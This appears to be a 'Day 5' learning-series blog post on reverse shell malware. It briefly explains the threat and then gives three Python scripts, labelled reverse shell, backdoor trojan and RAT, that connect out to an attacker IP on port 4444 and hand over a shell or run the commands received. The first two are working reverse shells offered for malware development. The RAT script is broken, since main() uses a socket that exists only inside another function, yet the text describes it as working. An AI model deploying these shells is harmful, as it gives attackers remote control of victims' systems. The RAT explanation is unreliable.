10-Days of learning - Day 5 - Reverse Shell Malware
Reverse Shell Malware
Why is reverse shell malware dangerous?
- It allows attackers to bypass some of the security measures and gain unauthorized access to data and/or execute commands on the target system.
- It can be used to install additional malware or to steal sensitive information.
The Importance of Reverse Shell Malware
- It highlights the need for strong security measures, such as firewalls and intrusion detection systems, to detect and prevent reverse shell attacks.
- It serves as a reminder to keep software and systems up to date and to follow best practices for securing them.
Examples of reverse shell malware:
1. Backdoor Trojan: This is a type of malware that allows attackers to gain remote access to a compromised system. It is often used as a means to establish a reverse shell connection.
2. Remote Access Trojan (RAT): A RAT is a type of malware that allows attackers to remotely access and control a compromised system. It can be used to establish a reverse shell connection and perform various malicious activities.
3. Rootkit: A rootkit is a type of malware that hides its presence on a system by modifying system files and registry entries. It can be used to establish a reverse shell connection and perform other malicious activities.
Reverse Shell Example
import socket
import subprocess
# Define the attacker's IP address and port
attacker_ip = '192.168.1.100'
attacker_port = 4444
# Create a socket object
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect to the attacker's machine
s.connect((attacker_ip, attacker_port))
# Receive commands from the attacker
while True:
command = s.recv(1024).decode()
if command.lower() == 'exit':
break
output = subprocess.run(command, shell=True, capture_output=True)
s.send(output.stdout)
# Close the socket connection
s.close()
In this example, we import the 'socket' module to create a socket object and the 'subprocess' module to execute commands on the target system. We define the attacker’s IP address and port, create a socket connection, and enter a loop to receive commands from the attacker. We execute the received commands on the target system using the 'subprocess.run()' function and send the output back to the attacker.
Back Door Trojan
import os
import socket
import subprocess
def reverse_shell():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.8", 4444))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
subprocess.call(["/bin/sh", "-i"])
reverse_shell()
Attacker Machine
We use the os, socket, and subprocess modules for the basic functions the operating system, and slo to get the ability to create network sockets. The script defines a function reverse_shell() that does the following:
- Creates a socket object s and connects it to the attacker’s IP address (here, “192.168.0.8”) on port 4444.
- The os.dup2() function is used to redirect the standard input, output, and error streams to the socket connection. This means that the attacker can now send commands to the target system, and the results will be returned through the same socket.
- The subprocess.call() function is used to start a new shell (/bin/sh -i), which allows the attacker to interact with the target system via a command-line interface.
When reverse_shell() is called, the target machine connects back to the attacker, and the attacker can execute shell commands remotely.
Remote Access Trojan (RAT):
import os
import socket
import subprocess
def reverse_shell():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.10", 4444))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
subprocess.call(["/bin/sh", "-i"])
def main():
while True:
command = s.recv(1024).decode()
if command == "exit":
break
output = subprocess.check_output(command, shell=True)
s.send(output)
reverse_shell()
main()
This script extends the functionality of the first script by adding the main() function to handle remote command execution. Here’s how it works:
- reverse_shell(): This function is identical to the one in the backdoor trojan example. It creates a socket connection to the attacker’s IP address and redirects the input, output, and error streams to the socket. It then launches a shell (/bin/sh -i) for the attacker to interact with the target system.
- main(): After establishing the reverse shell, the script enters a loop that waits for commands from the attacker:
- The s.recv(1024).decode() reads a command from the attacker over the socket.
- If the attacker sends the “exit” command, the loop breaks, and the connection is terminated.
- Otherwise, it executes the received command using subprocess.check_output(), which runs the command and captures its output.
- The result of the command is then sent back to the attacker over the socket.
This combination of reverse_shell() and main() allows the attacker to not only open a reverse shell but also interactively issue commands and receive their output, effectively controlling the target system remotely.
These scripts establish a reverse shell connection to a specified IP address and port in this case 192.168.0.8:4444. They then execute a shell command on the compromised system, allowing the attacker to interact with the system remotely.
Python scripting is a powerful tool for creating reverse shell malware because it allows you to remotely control a compromised system. Malware authors can use Python to create scripts that can steal sensitive information, install backdoors, or gain unauthorized access to a system.
Remember to practice ethical hacking and follow the law when performing malware analysis and development. Any misuse of the content is strictly prohibited.
